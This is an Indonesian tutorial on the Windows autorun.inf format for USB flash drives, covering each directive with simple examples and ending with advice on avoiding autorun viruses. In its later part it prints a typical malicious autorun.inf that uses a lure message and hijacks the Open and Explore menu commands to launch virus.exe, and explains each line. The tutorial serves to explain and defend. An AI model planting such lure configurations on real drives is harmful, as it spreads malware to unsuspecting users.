Kita akan membuat suatu file yang bernama autorun.inf dengan bantuan program notepad. Klik ganda icon Flash Disk sehingga isinya terlihat. Lalu buat suatu file baru dengan mengklik kanan pada sembarang bagian kosong, sehingga menu konteks tampil. Pilih New –Text Document. Lihat gambar 2. Suatu file teks scrap akan muncul. Beri nama file tersebut dengan nama autorun.inf. Klik ganda file tersebut, maka program notepad akan aktif. Siap untuk menerima pengetikan data-data autorun. Lakukan pengetikan data dan simpan dengan mengklik File – Save.


Gambar 2 : Membuat file teks baru

Sekarang kita cermati perintah-perintah yang ada pada section [autorun].
Perintah action
Masukan atau perintah ini, mendefinisikan teks yang akan dipakai untuk dialog autoplay. Tepatnya, sebagai handle yang mewakili program yang disebutkan oleh perintah Open atau Shellexecute. Sedangkan value yang dimasukkan dapat berupa teks atau suatu resource yang ada dalam suatu file binner. Sintaksnya :

action=Text
atau
action=@[filepath]filename,-resourceID

Masukan Text  diisi dengan teks yang akan ditampilkan. Sedangkan masukan Filepath menunjukkan loakasi (path) dari suatu directory dimana file binner yang berisi string tersebut berada. Jika path tidak disebutkan, maka dianggap disimpan di root directory drive. Masukan Filename diisi nama file binner (atau execute). Sedangkan masukan resourceID berisi ID string yang ada dalam file binner.
Perintah ini hanya dipakai di Microsoft Windows XP Service Pack 2 (SP2) dan sesudahnya. Contoh sederhana pemakaiannya adalah sebagai berikut :

[autorun]
action= Klik ini untuk test setup autorun
open=test.exe 

Ketikkan data tersebut pada file autorun.inf dan simpan. Pada saat Flash Disk kita tancapkan di port USB, maka perintah tersebut akan dijalankan. Tampilannya lebih kurang seperti terlihat pada gambar 3.


Gambar 3 : Hasil perintah action

Perintah icon
Perintah ini mendefinisikan icon yang akan ditampilkan pada drive. Sintaksnya :

icon=filename[,index]

Masukan filename diisi dengan nama dari file jenis *.ico, *.bmp, *.exe atau *.dll, yang menngandung icon. Jika dalam suatu file berisi lebih dari satu icon, maka harus disebutkan index icon dengan basis nol. Jadi hitungan dimulai dari 0. Artinya index 0 sama dengan icon pertama.
File icon harus berada pada directory yang sama dengan file yang didefinisikan oleh perintah Open. Sebagai ilustasi, anggap kita mempunyai file execute dengan nama Test.exe . File ini mempunyai beberapa icon didalam filenya. Dan kita ingin memakai icon kedua yang ada, maka perintahnya adalah :  
[autorun]
Icon=test.exe,1

Jika kita ingin agar icon pertama yang tampil, maka cukup kita ganti datanya sebagai berikut.
[autorun]
Icon=test.exe

Ketikkan data tersebut pada file autorun.inf dan simpan. Pada saat Flash Disk kita tancapkan di port USB, maka perintah tersebut akan dijalankan. Hasilnya lebih kurang seperti terlihat pada gambar 4.


Gambar 4 : Icon Flash Disk berubah sama dengan icon file exe

Perintah label
Perintah ini berguna untuk mendefiniskan label teks yang akan ditampilkan. Sintaksnya :

Label=text

Masukan Text berisi data string teks yang dapat berisi spasi. Sebagai ilustrasi, misalkan kita ingin agar keterangan pada drive bertuliskan : autorun test, maka perintahnya : 

[autorun]
Icon=test.exe,1
Label=autorun test

Hasilnya seperti terlihat pada gambar 5.


Gambar 5 : Keterangan label Flash Disk berubah

Perintah open
Perintah ini dipakai untuk mendefinisikan path dan nama file dari aplikasi yang akan dijalankan oleh autorun saat disk (CD) dimasukkan ke drive. Sintaksnya :

open=[exepath]exefile [param1 [param2] ...]

Masukan exepath menunjukkan lokasi dimana file exe berada. Masukan exefile berisi masukan dari Nama file exe yang akan dijalankan. Sedangkan masukan param, param2…. Berisi parameter tambahan yang akan di pass ke aplikasi
Yang perlu diperhatikan, jika isi perintah Open ini hanya berisi nama file exe saja, maka file exe harus berada di root directory drive. Jika kita ingin menjalankan file yang disimpan di directory lain, maka kita harus menyebutkan path-nya. Bila dibutuhkan, kita dapat menyertakan command-line parameter untuk di –pass ke aplikasi startup.
Berikut ini adalah contoh isi autorun.inf sederhana.
  
[autorun] 
open=Coba.exe 
icon=Coba.exe,1

Isi file tersebut menyebutkan, bahwa aplikasi starup (file execute) yang akan dijalankan adalah Coba.exe. Sedangkan icon kedua yang ada dalam file coba.exe, akan dipakai mewakili CD-ROM drive menggantikan icon standard drive.

Perintah shellexecute
Perintah ini digunakan unutk mendefinisikan aplikasi atau data file yang akan dijalankan oleh autorun secara ShellExecuteEx.

shellexecute=[filepath]filename[param1, [param2]...]

Masukan filepath  berisi string yang menyebutkan dimana path directory file data atau file execute berada. Jika path tidak disebutkan maka file harus berada di root directory drive. Masukan filename berisi nama file. Jika filenya adalah file execute maka akan dijalankan. Sedangkan, jika isinya adalah file data maka ia haruslah anggota dari suatu file class. Artinya jenis file data harus ada dalam daftar file yang dikenali oleh Windows. Sehingga ShellExecuteEx dapat menjalankan file data tersebut dengan perintah default terkait dengan file class.
Masukan paramx  berisi tambahan parameter yang akan di lewatkan ke ShellExecuteEx.
Masukan (perintah) ShellExecuteEx ini mirip dengan perintah Open. Hanya saja mengijinkan kita memakai informasi asosiasi file untuk menjalankan suatu aplikasi.

[autorun]
shellexecute=test.exe

Perintah diatas menjalankan file test.exe yang ada di root directory drive. Atau contoh lain :
[autorun]
shellexecute=Datakubaca.txt

Perintah diatas menjalankan file baca.txt yang ada di directory Dataku.

Perintah shell
Perintah ini dipakai untuk mendefinisikan perintah default untuk shortcut menu (menu konteks) drive. Sintaknya :

shell=verb

Masukan verb adalah verb yang berhubungan dengan menu perintah. Verb dan menu terkaitnya harus didefinisikan di autorun.inf via perintah shellverb.  
Saat kita klik kanan icon drive, suatu shortcut menu (menu konteks) muncul. Jika file autorun ada, maka menu konteks tersebut akan “diambil alih” oleh autorun. Untuk mendefinisikan menu ini, pertama kita harus mendefinisikan verb, command string dan teks menu dengan perintah shellverb. Kemudian memakai perintah shell untuk membuat default menu perintah. Jika tidak, maka menu default akan berbunyi “autoplay”. 

Perintah shellverb
Perintah ini digunakan untuk mendefinisikan perintah tambahan pilihan menu shortcut (menu konteks). Sintaknya :

shellverbcommand=Filename.exe 
shellverb=MenuText

Masukan Verb yang ada pada menu perintah shellverbcommand, akan berhubungan dengan suatu file execute. Verb tidak boleh berisi spasi. Singkat kata, verb diisini adalah teks yang ditampilkan di menu konteks.
Masukan Filename.exe berisi data path dan nama file aplikasi yang menjalankan perintah   
Masukan MenuText  berisi teks yang akan ditampilkan pada menu konteks. Jika dihilangkan maka teks pada verb yang akan ditampilkan. Menu text dapat berisi huruf besar dan kecil, juga berisi spasi.  
Saat kita melakukan klik kanan pada icon drive, menu konteks akan tampil. Dengan membuat perintah shell/verb maka akan menambah masukan di menu konteks tersebut. Masukan ini ada dua. Pertama, shell/verb/command, yang berguna untuk menentukan file mana yang akan dijalankan. Kedua, adalah shell/verb yang Kita digunakan untuk menampilkan teks di menu konteks.
Untuk membuat suatu default perintah menu konteks, definisikan dengan shell/verb dan buatlah menjadi default dengan perintah shell.
Mungkin keterangan ini agak membingungkan, tapi dengan suatu contoh akan membuatnya mudah. Perhatikan contoh berikut:

[AutoRun]
shellcobacommand=notepad Datakubaca.txt 
shellcoba=Cobalah Saya
shell=coba

Dari data di atas verb-nya adalah coba dengan string perintah “notepad Datakubaca.txt”. Menu teksnya adalah Cobalah Saya. Dan perintah dibuat default dengan perintah shell. Jika nanti kita pilih pilihan ini maka file baca.txt akan dibuka dengan program Notepad. 
Agar dapat membuat fungsi ini berjalan dengan baik, sebelumnya kita harus membuat suatu folder terlebih dahulu dengan nama DATAKU. Juga, didalamnya harus terdapat file yang bernama BACA.TXT. 
Misalnya, kita ketikkan data tersebut pada file autorun.inf dan simpan. Pada saat Flash Disk kita tancapkan di port USB, maka perintah tersebut akan dijalankan. Hasilnya lebih kurang seperti terlihat pada gambar 6.


Gambar 6 : Menu konteks bertambah

Autorun jebakan pada Flash Disk 

Seperti telah disinggung di muka, Autorun awalnya ditujukan untuk kemudahan pemakaian CD-ROM. Namun pada perkembangannya ternyata fungsi autorun di eksploitasi dan “didayagunakan” oleh pembuat virus untuk melakukan eksekusi program virus. Jadi, flashdisk yang seharusnya tidak berisi file autorun.inf, akan dijejali dengan file tersebut. Akibatnya ? Cukup fatal ! Menjamurlah virus disana-sini dengan bantuan autorun yang disalahgunakan via flashdisk.  
Lalu, isi file autorun.inf nya bagaimana ? Berikut ini, sekadar contoh, tipikal isi dari file autorun yang di eksploitasi oeh program virus.

[AutoRun]
icon=virus.exe
action=Klik untuk menjalankan file gambar hot
shellexecute= virus.exe
shellopenCommand= virus.exe
shellExploreCommand= virus.exe

Jika diuraikan secara ringkas, maka deskripsi per barisnya adalah sebagai berikut.
Perintah icon=test.exe digunakan untuk memanipulsi icon tampilan Flash Disk, sehingga ikon standar disk akan diganti dengan icon file executable yang benama test.exe.  
Perintah action=Klik untuk menjalankan file gambar hot. Dipakai untuk menampilkan pesan yang amat menantang dan memancing korban, agar mengklik pilihan ini. Misalnya dengan pesan : Klik untuk menjalankan file gambar hot
Perintah shellexecute=test.exe digunakan untuk memasang perangkap dengan perintah shellexecute, agar saat icon Flash Disk diklik ganda pemakai, maka akan aktiflah file virus.exe.
Perintah shellopenCommand=test.exe untuk menjebak pemakai saat melakukan klik kanan pada Flash Disk, dengan cara mengganti isi pilihan default menu konteks yang bernama open. Jika pemakai memilih Open yang dijalankan adalah file virus.exe.
Perintah shellExploreCommand=test.exe digunakan untuk menjebak pemakai saat melakukan klik kanan pada Flash Disk, dengan cara mengganti isi pilihan default menu konteks yang bernama Explore. Jika pemakai memilih Explore, yang dijalankan adalah file virus.exe.
Dengan jebakan yang begitu rapat, sungguh membuat pemakai awam yang kurang waspada menjadi tidak berdaya. Umumnya pemakai akan membuka Flash Disk via My Computer dan mengklik ganda icon Flash Disk. Akibatnya ? Aktiflah sang virus.

Bagaimana berkelit ?

Agak susah menjawab pertanyaan ini. Namun, bahaya jebakan autorun dapat sedikit dikurangi dengan mematikan fitur autorun. Penon-aktifan fitur ini dapat dilakukan via Policy Editor, ataupun melakukan manipulasi langsung via Regedit. Dan ini membutuhkan pembahasan tersendiri.
Namun, cara sederhana, temporer, untuk menghindari jebakan autorun ini dapat dilakukan dengan memakai jasa Windows Explorer (atau My Documents). 
Panggil My Documents. Klik Start – Pilih My Documents. Jendela My Documents. Akan muncul. Klik Tools dan pilih Folder Options. Kita akan mengatur setingan View Windows Explorer terlebih dahulu. Lihat gambar 7.


Gambar 7 : Memanggil My Document dan memilih Folder Options

Saat jendela Folder Options muncul. Klik Tab View. Dan klik pilihan Show Hidden Files and folders. Langkah ini berguna untuk menampilkan file yang tersembunyi. Lihat gambar 8.


Gambar 8 : Mengatur View memilih Show Hidden Files and folders

Langkah berikutnya, adalah menampilkan file System. Masih pada tab yang sama, klik Hide Protected operating system (recommended). Akan muncul pesan peringatan Windows. Klik Yes untuk mengabaikan pesan tersebut. Lihat gambar 9.


Gambar : Pesan peringatan 

Setelah itu pilihan Hide Protected operating system (recommended) akan tidak tercentang, klk OK. Lihat gambar 10.


Gambar 10 : Menampilkan file system lalu klik Ok.

Sekarang saatnya menancapkan Flash Disk. Jika fitur autorun berjalan, maka seharusnya akan tampil kotak dialog autoplay. Disarankan untuk memilih Take no action. Sehingga folder Flash Disk tidak akan terbuka. Lihat gambar 11.


Gambar 11 : kotak dialog autoplay – autorun

Panggil My Documents. Klik Start – pilih My Documents. My Documents akan muncul. Jika tampilan panel sebelah kiri My Documents tidak menunjukkan folder tree. Maka klik tombol Folder. Lihat gambar 12.


Gambar 12 : Mengklik tombol Folder

Sesudah panel kiri My Dcouments menampilkan folder tree, Klik My computer dan pilih Drive dimana Flash Disk berada. Maka pada panel sebelah kanan, akan terlihat isi dari Flash Disk, berikut file-file tersembunyi.  


Gambar 13 : memilih drive Flash Disk dari folder

Jika sudah sampai tahap ini, langkah awal yang harus dilakukan adalah menghapus file autorun.inf. Sesudah itu, jika terdapat file-file tersembunyi yang menurut kita mencurigakan, hapus saja ! Dengan trik sederhana ini, diharapkan penyebaran virus yang mengekploitasi fitur autorun akan sedikit terhambat. Coba saja, semoga berhasil !